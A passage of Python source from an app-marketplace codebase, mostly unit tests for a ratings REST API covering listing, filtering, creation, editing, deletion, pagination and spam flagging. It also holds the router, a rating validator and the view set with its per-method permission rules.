    def test_has_cors(self):
        self.assertCORS(self.client.get(self.list_url),
                        'get', 'post', 'put', 'delete')
    def test_options(self):
        res = self.anon.options(self.list_url)
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        ok_('application/json' in data['renders'])
        ok_('application/json' in data['parses'])
    # --- GET list / detail -------------------------------------------------
    def test_get_empty_with_app(self):
        AddonUser.objects.create(user=self.user, addon=self.app)
        res, data = self._get_url(self.list_url, app=self.app.pk)
        eq_(res.status_code, 200)
        eq_(data['info']['average'], self.app.average_rating)
        eq_(data['info']['slug'], self.app.app_slug)
        # App authors can't rate their own app.
        assert not data['user']['can_rate']
        assert not data['user']['has_rated']
    def test_get(self):
        first_version = self.app.current_version
        rev = Review.objects.create(addon=self.app, user=self.user,
                                    version=first_version,
                                    body=u'I lôve this app',
                                    rating=5)
        pk = rev.pk
        ver = amo.tests.version_factory(addon=self.app, version='2.0',
                                        file_kw=dict(status=amo.STATUS_PUBLIC))
        self.app.update_version()
        res, data = self._get_url(self.list_url, app=self.app.pk)
        eq_(data['info']['average'], self.app.average_rating)
        eq_(data['info']['slug'], self.app.app_slug)
        eq_(data['info']['current_version'], ver.version)
        eq_(data['user']['can_rate'], True)
        eq_(data['user']['has_rated'], True)
        eq_(len(data['objects']), 1)
        self.assertApiUrlEqual(data['objects'][0]['app'], '/apps/app/337141/')
        eq_(data['objects'][0]['body'], rev.body)
        self.assertCloseToNow(data['objects'][0]['created'], now=rev.created)
        eq_(data['objects'][0]['is_author'], True)
        self.assertCloseToNow(data['objects'][0]['modified'], now=rev.modified)
        eq_(data['objects'][0]['rating'], rev.rating)
        eq_(data['objects'][0]['report_spam'],
            reverse('ratings-flag', kwargs={'pk': pk}))
        eq_(data['objects'][0]['resource_uri'],
            reverse('ratings-detail', kwargs={'pk': pk}))
        eq_(data['objects'][0]['user']['display_name'], self.user.display_name)
        # The serialized version is the one the review was left on, not the
        # app's (newer) current version.
        eq_(data['objects'][0]['version']['version'], first_version.version)
        eq_(data['objects'][0]['version']['resource_uri'],
            reverse('version-detail', kwargs={'pk': first_version.pk}))
    def test_is_flagged_false(self):
        Review.objects.create(addon=self.app, user=self.user2, body='yes')
        res, data = self._get_url(self.list_url, app=self.app.pk)
        eq_(data['objects'][0]['is_author'], False)
        eq_(data['objects'][0]['has_flagged'], False)
    def test_is_flagged_is_author(self):
        Review.objects.create(addon=self.app, user=self.user, body='yes')
        res, data = self._get_url(self.list_url, app=self.app.pk)
        eq_(data['objects'][0]['is_author'], True)
        eq_(data['objects'][0]['has_flagged'], False)
    def test_is_flagged_true(self):
        rat = Review.objects.create(addon=self.app, user=self.user2, body='ah')
        ReviewFlag.objects.create(review=rat, user=self.user,
                                  flag=ReviewFlag.SPAM)
        res, data = self._get_url(self.list_url, app=self.app.pk)
        eq_(data['objects'][0]['is_author'], False)
        eq_(data['objects'][0]['has_flagged'], True)
    def test_get_detail(self):
        fmt = '%Y-%m-%dT%H:%M:%S'
        Review.objects.create(addon=self.app, user=self.user2, body='no')
        rev = Review.objects.create(addon=self.app, user=self.user, body='yes')
        url = reverse('ratings-detail', kwargs={'pk': rev.pk})
        res, data = self._get_url(url)
        self.assertCloseToNow(datetime.strptime(data['modified'], fmt))
        self.assertCloseToNow(datetime.strptime(data['created'], fmt))
        eq_(data['body'], 'yes')
    # --- ?user= / ?app= filtering ------------------------------------------
    def test_filter_self(self):
        Review.objects.create(addon=self.app, user=self.user, body='yes')
        Review.objects.create(addon=self.app, user=self.user2, body='no')
        self._get_filter(user=self.user.pk)
    def test_filter_mine(self):
        Review.objects.create(addon=self.app, user=self.user, body='yes')
        Review.objects.create(addon=self.app, user=self.user2, body='no')
        self._get_filter(user='mine')
    def test_filter_mine_anonymous(self):
        Review.objects.create(addon=self.app, user=self.user, body='yes')
        self._get_filter(user='mine', client=self.anon, expected_status=403)
    def test_filter_by_app_slug(self):
        self.app2 = amo.tests.app_factory()
        Review.objects.create(addon=self.app2, user=self.user, body='no')
        Review.objects.create(addon=self.app, user=self.user, body='yes')
        res, data = self._get_filter(app=self.app.app_slug)
        eq_(data['info']['slug'], self.app.app_slug)
        eq_(data['info']['current_version'], self.app.current_version.version)
    def test_filter_by_app_pk(self):
        self.app2 = amo.tests.app_factory()
        Review.objects.create(addon=self.app2, user=self.user, body='no')
        Review.objects.create(addon=self.app, user=self.user, body='yes')
        res, data = self._get_filter(app=self.app.pk)
        eq_(data['info']['slug'], self.app.app_slug)
        eq_(data['info']['current_version'], self.app.current_version.version)
    def test_filter_by_invalid_app(self):
        Review.objects.create(addon=self.app, user=self.user, body='yes')
        self._get_filter(app='wrongslug', expected_status=404)
        self._get_filter(app=2465478, expected_status=404)
    # --- visibility: non-public apps and region exclusions ------------------
    @patch('mkt.ratings.views.get_region')
    def test_filter_by_nonpublic_app(self, get_region_mock):
        Review.objects.create(addon=self.app, user=self.user, body='yes')
        self.app.update(status=amo.STATUS_PENDING)
        get_region_mock.return_value = mkt.regions.US
        res, data = self._get_filter(app=self.app.app_slug, expected_status=403)
        eq_(data['detail'], 'The app requested is not public or not available '
                            'in region "us".')
    def test_filter_by_nonpublic_app_admin(self):
        # Admins may see ratings of non-public apps.
        Review.objects.create(addon=self.app, user=self.user, body='yes')
        self.grant_permission(self.user, 'Addons:Edit')
        self.app.update(status=amo.STATUS_PENDING)
        self._get_filter(app=self.app.app_slug)
    def test_filter_by_nonpublic_app_owner(self):
        # App authors may see ratings of their own non-public apps.
        Review.objects.create(addon=self.app, user=self.user, body='yes')
        AddonUser.objects.create(user=self.user, addon=self.app)
        self.app.update(status=amo.STATUS_PENDING)
        self._get_filter(app=self.app.app_slug)
    @patch('mkt.ratings.views.get_region')
    def test_filter_by_app_excluded_in_region(self, get_region_mock):
        Review.objects.create(addon=self.app, user=self.user, body='yes')
        AddonExcludedRegion.objects.create(addon=self.app,
                                           region=mkt.regions.BR.id)
        get_region_mock.return_value = mkt.regions.BR
        res, data = self._get_filter(app=self.app.app_slug, expected_status=403)
        eq_(data['detail'], 'The app requested is not public or not available '
                            'in region "br".')
    @patch('mkt.ratings.views.get_region')
    def test_filter_by_app_excluded_in_region_admin(self, get_region_mock):
        Review.objects.create(addon=self.app, user=self.user, body='yes')
        self.grant_permission(self.user, 'Addons:Edit')
        AddonExcludedRegion.objects.create(addon=self.app,
                                           region=mkt.regions.BR.id)
        get_region_mock.return_value = mkt.regions.BR
        self._get_filter(app=self.app.app_slug)
    @patch('mkt.ratings.views.get_region')
    def test_filter_by_app_excluded_in_region_owner(self, get_region_mock):
        Review.objects.create(addon=self.app, user=self.user, body='yes')
        AddonUser.objects.create(user=self.user, addon=self.app)
        AddonExcludedRegion.objects.create(addon=self.app,
                                           region=mkt.regions.BR.id)
        get_region_mock.return_value = mkt.regions.BR
        self._get_filter(app=self.app.app_slug)
    # --- anonymous access and user-state flags -------------------------------
    def test_anonymous_get_list_without_app(self):
        Review.objects.create(addon=self.app, user=self.user, body='yes')
        res, data = self._get_url(self.list_url, client=self.anon)
        eq_(res.status_code, 200)
        assert not 'user' in data
        eq_(len(data['objects']), 1)
        eq_(data['objects'][0]['body'], 'yes')
    def test_get_list_only_apps(self):
        # Reviews of non-app addons are never exposed by this endpoint.
        addon = amo.tests.addon_factory()
        Review.objects.create(addon=addon, user=self.user, body='no')
        res, data = self._get_url(self.list_url, client=self.anon)
        eq_(res.status_code, 200)
        eq_(len(data['objects']), 0)
    def test_get_detail_only_apps(self):
        addon = amo.tests.addon_factory()
        Review.objects.create(addon=addon, user=self.user, body='no')
        res, data = self._get_url(self.list_url, app=addon.pk)
        eq_(res.status_code, 404)
    def test_anonymous_get_list_app(self):
        res, data = self._get_url(self.list_url, app=self.app.app_slug,
                                  client=self.anon)
        eq_(res.status_code, 200)
        eq_(data['user'], None)
    def test_non_owner(self):
        res, data = self._get_url(self.list_url, app=self.app.app_slug)
        assert data['user']['can_rate']
        assert not data['user']['has_rated']
    def test_can_rate_unpurchased(self):
        self.app.update(premium_type=amo.ADDON_PREMIUM)
        res, data = self._get_url(self.list_url, app=self.app.app_slug)
        assert not res.json['user']['can_rate']
    def test_can_rate_purchased(self):
        self.app.update(premium_type=amo.ADDON_PREMIUM)
        AddonPurchase.objects.create(addon=self.app, user=self.user)
        res, data = self._get_url(self.list_url, app=self.app.app_slug)
        assert res.json['user']['can_rate']
    def test_isowner_true(self):
        Review.objects.create(addon=self.app, user=self.user, body='yes')
        res, data = self._get_url(self.list_url, app=self.app.app_slug)
        data = json.loads(res.content)
        eq_(data['objects'][0]['is_author'], True)
    def test_isowner_false(self):
        Review.objects.create(addon=self.app, user=self.user2, body='yes')
        res, data = self._get_url(self.list_url, app=self.app.app_slug)
        data = json.loads(res.content)
        eq_(data['objects'][0]['is_author'], False)
    def test_isowner_anonymous(self):
        Review.objects.create(addon=self.app, user=self.user, body='yes')
        res, data = self._get_url(self.list_url, app=self.app.app_slug,
                                  client=self.anon)
        data = json.loads(res.content)
        self.assertNotIn('is_author', data['objects'][0])
    def test_already_rated(self):
        Review.objects.create(addon=self.app, user=self.user, body='yes')
        res, data = self._get_url(self.list_url, app=self.app.app_slug)
        data = json.loads(res.content)
        assert data['user']['can_rate']
        assert data['user']['has_rated']
    def test_already_rated_version(self):
        # Packaged apps: a new version resets has_rated.
        self.app.update(is_packaged=True)
        Review.objects.create(addon=self.app, user=self.user, body='yes')
        amo.tests.version_factory(addon=self.app, version='3.0')
        self.app.update_version()
        res, data = self._get_url(self.list_url, app=self.app.app_slug)
        data = json.loads(res.content)
        assert data['user']['can_rate']
        assert not data['user']['has_rated']
    # --- POST (create) ------------------------------------------------------
    def _create(self, data=None, anonymous=False):
        # POST a rating payload (defaults below, overridable via `data`);
        # returns (response, parsed body or raw content).
        default_data = {
            'app': self.app.id,
            'body': 'Rocking the free web.',
            'rating': 5,
            'version': self.app.current_version.id
        }
        if data:
            default_data.update(data)
        json_data = json.dumps(default_data)
        client = self.anon if anonymous else self.client
        res = client.post(self.list_url, data=json_data)
        try:
            res_data = json.loads(res.content)
        except ValueError:
            res_data = res.content
        return res, res_data
    def test_anonymous_create_fails(self):
        res, data = self._create(anonymous=True)
        eq_(res.status_code, 403)
    @patch('mkt.ratings.views.record_action')
    def test_create(self, record_action):
        log_review_id = amo.LOG.ADD_REVIEW.id
        eq_(ActivityLog.objects.filter(action=log_review_id).count(), 0)
        res, data = self._create()
        eq_(201, res.status_code)
        pk = Review.objects.latest('pk').pk
        eq_(data['body'], 'Rocking the free web.')
        eq_(data['rating'], 5)
        eq_(data['resource_uri'], reverse('ratings-detail', kwargs={'pk': pk}))
        eq_(data['report_spam'], reverse('ratings-flag', kwargs={'pk': pk}))
        eq_(record_action.call_count, 1)
        eq_(record_action.call_args[0][0], 'new-review')
        eq_(record_action.call_args[0][2], {'app-id': 337141})
        eq_(ActivityLog.objects.filter(action=log_review_id).count(), 1)
        return res, data
    def test_create_packaged(self):
        self.app.update(is_packaged=True)
        res, data = self.test_create()
        eq_(data['version']['version'], '1.0')
    def test_create_bad_data(self):
        res, data = self._create({'body': None})
        eq_(400, res.status_code)
        assert 'body' in data
    def test_create_nonexistent_app(self):
        res, data = self._create({'app': -1})
        eq_(400, res.status_code)
        assert 'app' in data
    @patch('mkt.ratings.serializers.get_region')
    def test_create_for_nonregion(self, get_region_mock):
        AddonExcludedRegion.objects.create(addon=self.app,
                                           region=mkt.regions.BR.id)
        get_region_mock.return_value = mkt.regions.BR
        res, data = self._create()
        eq_(403, res.status_code)
    def test_create_for_nonpublic(self):
        self.app.update(status=amo.STATUS_PENDING)
        res, data = self._create()
        eq_(403, res.status_code)
    def test_create_duplicate_rating(self):
        self._create()
        res, data = self._create()
        eq_(409, res.status_code)
    def test_new_rating_for_new_version(self):
        # Packaged apps allow one rating per version.
        self.app.update(is_packaged=True)
        self._create()
        version = amo.tests.version_factory(addon=self.app, version='3.0')
        self.app.update_version()
        eq_(self.app.reload().current_version, version)
        res, data = self._create()
        eq_(201, res.status_code)
        eq_(data['version']['version'], '3.0')
    def test_create_duplicate_rating_packaged(self):
        self.app.update(is_packaged=True)
        self._create()
        res, data = self._create()
        eq_(409, res.status_code)
    def test_create_own_app(self):
        AddonUser.objects.create(user=self.user, addon=self.app)
        res, data = self._create()
        eq_(403, res.status_code)
    def test_rate_unpurchased_premium(self):
        self.app.update(premium_type=amo.ADDON_PREMIUM)
        res, data = self._create()
        eq_(403, res.status_code)
    def test_rate_purchased_premium(self):
        self.app.update(premium_type=amo.ADDON_PREMIUM)
        AddonPurchase.objects.create(addon=self.app, user=self.user)
        res, data = self._create()
        eq_(201, res.status_code)
    def _create_default_review(self):
        # Create the original review
        default_data = {
            'body': 'Rocking the free web.',
            'rating': 5
        }
        res, res_data = self._create(default_data)
        return res, res_data
    # --- PUT/PATCH (update) -------------------------------------------------
    def test_patch_not_implemented(self):
        self._create_default_review()
        pk = Review.objects.latest('id').pk
        json_data = json.dumps({
            'body': 'Totally rocking the free web.',
        })
        res = self.client.patch(reverse('ratings-detail', kwargs={'pk': pk}),
                                data=json_data)
        # Should return a 405 but permission check is done first. It's fine.
        eq_(res.status_code, 403)
    def _update(self, updated_data, pk=None):
        # Update the review
        if pk is None:
            pk = Review.objects.latest('id').pk
        json_data = json.dumps(updated_data)
        res = self.client.put(reverse('ratings-detail', kwargs={'pk': pk}),
                              data=json_data)
        try:
            res_data = json.loads(res.content)
        except ValueError:
            res_data = res.content
        return res, res_data
    def test_update(self):
        rev = Review.objects.create(addon=self.app, user=self.user,
                                    body='abcd', ip_address='1.2.3.4')
        new_data = {
            'body': 'Totally rocking the free web.',
            'rating': 4,
        }
        log_review_id = amo.LOG.EDIT_REVIEW.id
        eq_(ActivityLog.objects.filter(action=log_review_id).count(), 0)
        res, data = self._update(new_data)
        eq_(res.status_code, 200)
        eq_(data['body'], new_data['body'])
        eq_(data['rating'], new_data['rating'])
        rev.reload()
        eq_(rev.body, new_data['body'])
        eq_(rev.rating, new_data['rating'])
        # user/ip_address must survive an edit untouched.
        eq_(rev.user, self.user)
        eq_(rev.ip_address, '1.2.3.4')
        eq_(ActivityLog.objects.filter(action=log_review_id).count(), 1)
    def test_update_admin(self):
        self.grant_permission(self.user, 'Apps:Edit')
        rev = Review.objects.create(addon=self.app, user=self.user2,
                                    body='abcd', ip_address='1.2.3.4')
        new_data = {
            'body': 'Edited by admin',
            'rating': 1,
        }
        log_review_id = amo.LOG.EDIT_REVIEW.id
        res = self.client.put(reverse('ratings-detail', kwargs={'pk': rev.pk}),
                              json.dumps(new_data))
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        eq_(data['body'], new_data['body'])
        eq_(data['rating'], new_data['rating'])
        rev.reload()
        eq_(rev.body, new_data['body'])
        eq_(rev.rating, new_data['rating'])
        eq_(rev.user, self.user2)
        eq_(rev.ip_address, '1.2.3.4')
        eq_(ActivityLog.objects.filter(action=log_review_id).count(), 1)
    def test_update_bad_data(self):
        self._create_default_review()
        res, data = self._update({'body': None})
        eq_(400, res.status_code)
        assert 'body' in data
    def test_update_change_app(self):
        # The 'app' field is read-only on edit; attempts are ignored.
        _, previous_data = self._create_default_review()
        self.app2 = amo.tests.app_factory()
        new_data = {
            'body': 'Totally rocking the free web.',
            'rating': 4,
            'app': self.app2.pk
        }
        res, data = self._update(new_data)
        eq_(res.status_code, 200)
        eq_(data['body'], new_data['body'])
        eq_(data['rating'], new_data['rating'])
        eq_(data['app'], previous_data['app'])
    def test_update_comment_not_mine(self):
        rev = Review.objects.create(addon=self.app, user=self.user2,
                                    body='yes')
        res = self.client.put(reverse('ratings-detail', kwargs={'pk': rev.pk}),
                              json.dumps({'body': 'no', 'rating': 1}))
        eq_(res.status_code, 403)
        rev.reload()
        eq_(rev.body, 'yes')
    # --- DELETE -------------------------------------------------------------
    def test_delete_app_mine(self):
        # App authors may delete reviews of their own app.
        AddonUser.objects.filter(addon=self.app).update(user=self.user)
        rev = Review.objects.create(addon=self.app, user=self.user2,
                                    body='yes')
        url = reverse('ratings-detail', kwargs={'pk': rev.pk})
        res = self.client.delete(url)
        eq_(res.status_code, 204)
        eq_(Review.objects.count(), 0)
        log_review_id = amo.LOG.DELETE_REVIEW.id
        eq_(ActivityLog.objects.filter(action=log_review_id).count(), 1)
    def test_delete_comment_mine(self):
        rev = Review.objects.create(addon=self.app, user=self.user, body='yes')
        url = reverse('ratings-detail', kwargs={'pk': rev.pk})
        res = self.client.delete(url)
        eq_(res.status_code, 204)
        eq_(Review.objects.count(), 0)
        log_review_id = amo.LOG.DELETE_REVIEW.id
        eq_(ActivityLog.objects.filter(action=log_review_id).count(), 1)
    def test_delete_addons_admin(self):
        self.grant_permission(self.user, 'Apps:Edit')
        rev = Review.objects.create(addon=self.app, user=self.user2,
                                    body='yes')
        url = reverse('ratings-detail', kwargs={'pk': rev.pk})
        res = self.client.delete(url)
        eq_(res.status_code, 204)
        eq_(Review.objects.count(), 0)
        log_review_id = amo.LOG.DELETE_REVIEW.id
        eq_(ActivityLog.objects.filter(action=log_review_id).count(), 1)
    def test_delete_users_admin(self):
        self.grant_permission(self.user, 'Users:Edit')
        rev = Review.objects.create(addon=self.app, user=self.user2,
                                    body='yes')
        url = reverse('ratings-detail', kwargs={'pk': rev.pk})
        res = self.client.delete(url)
        eq_(res.status_code, 204)
        eq_(Review.objects.count(), 0)
        log_review_id = amo.LOG.DELETE_REVIEW.id
        eq_(ActivityLog.objects.filter(action=log_review_id).count(), 1)
    def test_delete_not_mine(self):
        rev = Review.objects.create(addon=self.app, user=self.user2,
                                    body='yes')
        url = reverse('ratings-detail', kwargs={'pk': rev.pk})
        self.app.authors.clear()
        res = self.client.delete(url)
        eq_(res.status_code, 403)
        eq_(Review.objects.count(), 1)
        log_review_id = amo.LOG.DELETE_REVIEW.id
        eq_(ActivityLog.objects.filter(action=log_review_id).count(), 0)
    def test_delete_not_there(self):
        url = reverse('ratings-detail', kwargs={'pk': 123})
        res = self.client.delete(url)
        eq_(res.status_code, 404)
        log_review_id = amo.LOG.DELETE_REVIEW.id
        eq_(ActivityLog.objects.filter(action=log_review_id).count(), 0)
class TestRatingResourcePagination(RestOAuth, amo.tests.AMOPaths):
    """Tests for limit/offset pagination metadata on the ratings list."""
    fixtures = fixture('user_2519', 'user_999', 'webapp_337141')

    def setUp(self):
        super(TestRatingResourcePagination, self).setUp()
        self.app = Webapp.objects.get(pk=337141)
        self.user = UserProfile.objects.get(pk=2519)
        self.user2 = UserProfile.objects.get(pk=31337)
        self.user3 = UserProfile.objects.get(pk=999)
        self.url = reverse('ratings-list')

    def test_pagination(self):
        first_version = self.app.current_version
        # Three reviews with staggered creation dates; newest comes first.
        rev1 = Review.objects.create(addon=self.app, user=self.user,
                                     version=first_version,
                                     body=u'I häte this app',
                                     rating=0)
        rev2 = Review.objects.create(addon=self.app, user=self.user2,
                                     version=first_version,
                                     body=u'I lôve this app',
                                     rating=5)
        rev3 = Review.objects.create(addon=self.app, user=self.user3,
                                     version=first_version,
                                     body=u'Blurp.',
                                     rating=3)
        rev1.update(created=self.days_ago(3))
        rev2.update(created=self.days_ago(2))
        res = self.client.get(self.url, {'limit': 2})
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        eq_(len(data['objects']), 2)
        eq_(data['objects'][0]['body'], rev3.body)
        eq_(data['objects'][1]['body'], rev2.body)
        eq_(data['meta']['total_count'], 3)
        eq_(data['meta']['limit'], 2)
        eq_(data['meta']['previous'], None)
        eq_(data['meta']['offset'], 0)
        next = urlparse(data['meta']['next'])
        eq_(next.path, self.url)
        eq_(QueryDict(next.query).dict(), {u'limit': u'2', u'offset': u'2'})

        res = self.client.get(self.url, {'limit': 2, 'offset': 2})
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        eq_(len(data['objects']), 1)
        eq_(data['objects'][0]['body'], rev1.body)
        eq_(data['meta']['total_count'], 3)
        eq_(data['meta']['limit'], 2)
        prev = urlparse(data['meta']['previous'])
        # BUG FIX: this asserted `next.path` (already checked above) instead
        # of the freshly parsed `prev` link.
        eq_(prev.path, self.url)
        eq_(QueryDict(prev.query).dict(), {u'limit': u'2', u'offset': u'0'})
        eq_(data['meta']['offset'], 2)
        eq_(data['meta']['next'], None)

    def test_total_count(self):
        # total_count comes from the app's denormalized total_reviews once
        # at least one result exists (see RatingPaginator.count).
        self.app.update(total_reviews=10)
        res = self.client.get(self.url)
        data = json.loads(res.content)
        # We know we have no results, total_reviews isn't used.
        eq_(data['meta']['total_count'], 0)
        Review.objects.create(addon=self.app, user=self.user,
                              version=self.app.current_version,
                              body=u'I häte this app',
                              rating=0)
        self.app.update(total_reviews=10)
        res = self.client.get(self.url)
        data = json.loads(res.content)
        eq_(data['meta']['total_count'], 10)
class TestReviewFlagResource(RestOAuth, amo.tests.AMOPaths):
    """Tests for the flag-a-rating endpoint (ratings-flag)."""
    fixtures = fixture('user_2519', 'webapp_337141')

    def setUp(self):
        super(TestReviewFlagResource, self).setUp()
        self.app = Webapp.objects.get(pk=337141)
        self.user = UserProfile.objects.get(pk=2519)
        self.user2 = UserProfile.objects.get(pk=31337)
        # The review being flagged belongs to user2; self.user does the
        # flagging.
        self.rating = Review.objects.create(addon=self.app,
                                            user=self.user2, body='yes')
        self.flag_url = reverse('ratings-flag', kwargs={'pk': self.rating.pk})

    def test_has_cors(self):
        self.assertCORS(self.client.post(self.flag_url), 'post')

    def test_flag(self):
        data = json.dumps({'flag': ReviewFlag.SPAM})
        res = self.client.post(self.flag_url, data=data)
        eq_(res.status_code, 201)
        rf = ReviewFlag.objects.get(review=self.rating)
        eq_(rf.user, self.user)
        eq_(rf.flag, ReviewFlag.SPAM)
        eq_(rf.note, '')

    def test_flag_note(self):
        # Supplying a non-empty note forces the flag to OTHER.
        note = 'do not want'
        data = json.dumps({'flag': ReviewFlag.SPAM, 'note': note})
        res = self.client.post(self.flag_url, data=data)
        eq_(res.status_code, 201)
        rf = ReviewFlag.objects.get(review=self.rating)
        eq_(rf.user, self.user)
        eq_(rf.flag, ReviewFlag.OTHER)
        eq_(rf.note, note)

    def test_flag_anon(self):
        # Anonymous flagging is allowed; the flag is stored with no user.
        data = json.dumps({'flag': ReviewFlag.SPAM})
        res = self.anon.post(self.flag_url, data=data)
        eq_(res.status_code, 201)
        rf = ReviewFlag.objects.get(review=self.rating)
        eq_(rf.user, None)
        eq_(rf.flag, ReviewFlag.SPAM)
        eq_(rf.note, '')

    def test_flag_conflict(self):
        # A second flag by the same user yields 409 Conflict.
        data = json.dumps({'flag': ReviewFlag.SPAM})
        res = self.client.post(self.flag_url, data=data)
        res = self.client.post(self.flag_url, data=data)
        eq_(res.status_code, 409)
########NEW FILE########
__FILENAME__ = urls
from rest_framework import routers
from mkt.ratings.views import RatingViewSet
# Wire RatingViewSet into the URLconf; the 'ratings' base_name produces the
# 'ratings-list', 'ratings-detail' and 'ratings-flag' route names used
# throughout the serializers and tests.
router = routers.DefaultRouter()
router.register(r'rating', RatingViewSet, base_name='ratings')
urlpatterns = router.urls
########NEW FILE########
__FILENAME__ = validators
from django.core.exceptions import ValidationError
def validate_rating(value):
    """Raise ValidationError unless *value* is an integer from 1 to 5.

    NOTE: the range comparisons intentionally run before the isinstance
    check, and `long` makes this Python 2 only; non-numeric values rely on
    Py2's permissive mixed-type ordering to reach the isinstance test.
    """
    if value > 5 or value < 1 or not isinstance(value, (int, long)):
        raise ValidationError('Rating must be an integer between 1 and 5, '
                              'inclusive')
########NEW FILE########
__FILENAME__ = views
from django.core.paginator import Paginator
from django.http import Http404
import commonware.log
from rest_framework.decorators import action
from rest_framework.exceptions import (MethodNotAllowed, NotAuthenticated,
PermissionDenied)
from rest_framework.mixins import CreateModelMixin
from rest_framework.permissions import AllowAny, IsAuthenticated
from rest_framework.viewsets import GenericViewSet, ModelViewSet
import amo
from access.acl import check_addon_ownership
from lib.metrics import record_action
from reviews.models import Review, ReviewFlag
from mkt.api.authentication import (RestAnonymousAuthentication,
RestOAuthAuthentication,
RestSharedSecretAuthentication)
from mkt.api.authorization import (AllowOwner, AllowRelatedAppOwner, AnyOf,
ByHttpMethod, GroupPermission)
from mkt.api.base import CORSMixin, MarketplaceView
from mkt.ratings.serializers import RatingFlagSerializer, RatingSerializer
from mkt.regions import get_region
from mkt.webapps.models import Webapp
log = commonware.log.getLogger('z.api')
class RatingPaginator(Paginator):
    """Paginator that reads the count from the app's denormalized
    `total_reviews` field instead of issuing a COUNT query."""
    # FIXME: This is only right when ?app= filtering is applied, if no
    # filtering or if ?user= filtering is done, it's completely wrong.
    @property
    def count(self):
        # Peek at the first object; an empty queryset means zero without
        # needing a COUNT.
        try:
            r = self.object_list[0]
        except IndexError:
            return 0
        return r.addon.total_reviews
class RatingViewSet(CORSMixin, MarketplaceView, ModelViewSet):
    """REST endpoint for app ratings.

    Supports list/create/update/delete (PATCH is explicitly disabled)
    plus a POST `flag` action that delegates to RatingFlagViewSet.
    """
    # Unfortunately, the model class name for ratings is "Review".
    queryset = Review.objects.valid().filter(addon__type=amo.ADDON_WEBAPP)
    cors_allowed_methods = ('get', 'post', 'put', 'delete')
    # Per-verb permissions: reads are public, creation needs auth, edits
    # are owner-or-admin, deletes also allow the related app's owner and
    # the Users:Edit group.
    permission_classes = [ByHttpMethod({
        'options': AllowAny,  # Needed for CORS.
        'get': AllowAny,
        'post': IsAuthenticated,
        'put': AnyOf(AllowOwner,
                     GroupPermission('Apps', 'Edit')),
        'delete': AnyOf(AllowOwner,
                        AllowRelatedAppOwner,
                        GroupPermission('Users', 'Edit'),
                        GroupPermission('Apps', 'Edit')),
    })]
    authentication_classes = [RestOAuthAuthentication,
                              RestSharedSecretAuthentication,
                              RestAnonymousAuthentication]
    serializer_class = RatingSerializer
    paginator_class = RatingPaginator
    # FIXME: Add throttling ? Original tastypie version didn't have it...

    def filter_queryset(self, queryset):
        """
        Custom filter method allowing us to filter on app slug/pk and user pk
        (or the special user value "mine"). A full FilterSet is overkill here.
        """
        filters = {}
        app = self.request.GET.get('app')
        user = self.request.GET.get('user')
        if app:
            # Keep the resolved app around: list() uses it to append the
            # extra user/info payload to the response.
            self.app = self.get_app(app)
            filters['addon'] = self.app
        if user:
            filters['user'] = self.get_user(user)
        if filters:
            queryset = queryset.filter(**filters)
        return queryset

    def get_user(self, ident):
        # Resolve the ?user= value to a pk; the sentinel "mine" maps to
        # the authenticated user and requires being logged in.
        pk = ident
        if pk == 'mine':
            user = amo.get_user()
            if not user:
                # You must be logged in to use "mine".
                raise NotAuthenticated()
            pk = user.pk
        return pk

    def get_app(self, ident):
        """Return the Webapp for ?app=, enforcing visibility rules.

        Raises Http404 for unknown apps; raises PermissionDenied when the
        app is non-public or unlisted in the current region, unless the
        requester owns the app (or is an admin).
        """
        try:
            app = Webapp.objects.by_identifier(ident)
        except Webapp.DoesNotExist:
            raise Http404
        current_region = get_region()
        if ((not app.is_public()
             or not app.listed_in(region=current_region))
            and not check_addon_ownership(self.request, app)):
            # App owners and admin can see the app even if it's not public
            # or not available in the current region. Regular users or
            # anonymous users can't.
            raise PermissionDenied('The app requested is not public or not '
                                   'available in region "%s".' % current_region.slug)
        return app

    def list(self, request, *args, **kwargs):
        # When filtering by app, augment the standard list response with
        # the requester's rating ability and app-level rating info.
        response = super(RatingViewSet, self).list(request, *args, **kwargs)
        app = getattr(self, 'app', None)
        if app:
            user, info = self.get_extra_data(app, request.amo_user)
            response.data['user'] = user
            response.data['info'] = info
        return response

    def destroy(self, request, *args, **kwargs):
        # Audit-log the deletion before delegating to the default behavior.
        obj = self.get_object()
        amo.log(amo.LOG.DELETE_REVIEW, obj.addon, obj)
        log.debug('[Review:%s] Deleted by %s' %
                  (obj.pk, self.request.amo_user.id))
        return super(RatingViewSet, self).destroy(request, *args, **kwargs)

    def post_save(self, obj, created=False):
        # Audit-log creations/edits; new reviews also feed the metrics
        # pipeline via record_action.
        app = obj.addon
        if created:
            amo.log(amo.LOG.ADD_REVIEW, app, obj)
            log.debug('[Review:%s] Created by user %s ' %
                      (obj.pk, self.request.amo_user.id))
            record_action('new-review', self.request, {'app-id': app.id})
        else:
            amo.log(amo.LOG.EDIT_REVIEW, app, obj)
            log.debug('[Review:%s] Edited by %s' %
                      (obj.pk, self.request.amo_user.id))

    def partial_update(self, *args, **kwargs):
        # We don't need/want PATCH for now.
        raise MethodNotAllowed('PATCH is not supported for this endpoint.')

    def get_extra_data(self, app, amo_user):
        """Return the (user, info) dicts appended to list() responses.

        `user` is None for anonymous requesters; otherwise it says whether
        the user can rate the app (purchase required for premium apps,
        non-authorship for free ones) and whether they already have.
        `info` carries app-level rating metadata.
        """
        extra_user = None
        if amo_user and not amo_user.is_anonymous():
            if app.is_premium():
                # If the app is premium, you need to purchase it to rate it.
                can_rate = app.has_purchased(amo_user)
            else:
                # If the app is free, you can not be one of the authors.
                can_rate = not app.has_author(amo_user)
            filters = {
                'addon': app,
                'user': amo_user
            }
            if app.is_packaged:
                # Packaged apps are rated per current version.
                filters['version'] = app.current_version
            extra_user = {
                'can_rate': can_rate,
                'has_rated': Review.objects.valid().filter(**filters).exists()
            }
        extra_info = {
            'average': app.average_rating,
            'slug': app.app_slug,
            'current_version': getattr(app.current_version, 'version', None)
        }
        return extra_user, extra_info

    @action(methods=['POST'], permission_classes=[AllowAny])
    def flag(self, request, pk=None):
        # Validate that the target review exists, then delegate the flag
        # creation to RatingFlagViewSet.
        self.kwargs[self.lookup_field] = pk
        self.get_object()  # Will check that the Review instance is valid.
        request._request.CORS = RatingFlagViewSet.cors_allowed_methods
        view = RatingFlagViewSet.as_view({'post': 'create'})
        return view(request, *self.args, **{'review': pk})
class RatingFlagViewSet(CORSMixin, CreateModelMixin, GenericViewSet):
    """Create-only endpoint used to flag a rating for moderation.

